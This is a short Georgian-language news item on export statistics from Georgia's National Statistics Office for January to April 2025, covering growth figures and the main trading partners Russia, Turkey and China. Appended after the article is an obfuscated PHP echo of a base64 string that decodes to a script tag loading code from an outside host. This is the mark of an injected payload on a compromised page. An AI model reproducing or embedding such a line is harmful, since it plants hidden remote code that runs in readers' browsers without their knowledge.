gorgia
ავერსი jaluzi

ქართული პროდუქციის ექსპორტი 4.9%-ით გაიზარდა - ამის შესახებ აღნიშნულია სტატისტიკის ეროვნული სამსახურის ანგარიშში.

უწყების ინფორმაციით, 2025 წლის იანვარ-აპრილში საქართველოდან განხორციელებული საქონლის ექსპორტის მოცულობამ (არადეკლარირებული ექსპორტის გარეშე) 2.014 მლრდ აშშ დოლარი შეადგინა, რაც 14.2 პროცენტით მეტია გასული წლის შესაბამისი პერიოდის მაჩვენებელზე. ადგილობრივი ექსპორტი (ექსპორტი რეექსპორტის გარეშე), მთლიანი ექსპორტის 44.8 პროცენტს შეადგენს. აღნიშნული მაჩვენებელი წინა წლის შესაბამის პერიოდთან შედარებით 4.9 პროცენტით გაიზარდა და 902.2 მლნ. აშშ დოლარს გაუტოლდა.

ამასთან, 2025 წლის იანვარ-აპრილში ათი უმსხვილესი ქვეყნის წილმა საქართველოს მთლიან ადგილობრივ ექსპორტში 68.9 პროცენტი შეადგინა. ამ მხრივ, უმსხვილესი საექსპორტო პარტნიორებია: რუსეთი (173.4 მლნ. აშშ დოლარი), თურქეთი (87.9 მლნ. აშშ დოლარი) და ჩინეთი(77.8 მლნ. აშშ დოლარი).

78
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");